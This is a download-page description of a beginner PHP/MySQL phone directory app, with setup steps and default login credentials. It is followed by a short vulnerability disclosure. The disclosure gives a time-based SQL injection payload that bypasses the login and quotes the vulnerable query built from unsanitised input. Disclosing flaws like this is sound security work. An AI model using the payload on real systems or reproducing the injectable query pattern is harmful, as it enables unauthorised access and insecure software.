This is a PHP Mini-Project called Phone book/directory Web App. This is a simple web application for saving someone's contact number. This can be useful for a small company to serve as the employees/staffs contact directory or else. The main purpose of creating this app is to share this with you most especially for beginners and new to PHP language to have a simple PHP project to learn with. This will help you to learn how to develop a simple web application using the said programming language and MySQL Database that containing CRUD Operations/functionalities.
About the Phone book/Phone Directory Web App
This web-based application was developed using PHP, MySQL Database, HTML, CSS, and JavaScript. The application has a pleasant user interface and is easy to use. The system requires system users' credentials to access the list of the phone books or directories and other features of the application. The new user can create a new system account by registering their credentials. The source code is free to download. Feel Free to download and modify the source code to learn and enhance your PHP programming capabilities.
Requirements
Installation/Setup
Apache
and MySQL
.PHPMyAdmin
in a browser. i.e. http://localhost/phpmyadmin
phonebook
.SQL
file. The file is known as phonebook.sql
located inside the extracted source code folder.http://localhost/PhoneBook
.Username: khan
Password: 123
That's it! I hope this Phone book/directory Web App in PHP will help you with what you are looking for.
Note: Due to the size or complexity of this submission, the author has submitted it as a .zip file to shorten your download time. After downloading it, you will need a program like Winzip to decompress it.
Virus note: All files are scanned once-a-day by SourceCodester.com for viruses, but new viruses come out every day, so no prevention program can catch 100% of them.
FOR YOUR OWN SAFETY, PLEASE:
1. Re-scan downloaded files using your personal virus checker before using it.
2. NEVER, EVER run compiled files (.exe's, .ocx's, .dll's etc.)--only run source code.
# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
# Date: 21/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## SQL Injection
# Vulnerable page
http://localhost/PhoneBook/index.php
# Vulnerable paramater
username1 & password
# POC
Username = ' or sleep(5)='-- -
Password = ' '
Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
# Vulnerable Code
index.php line 13
$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");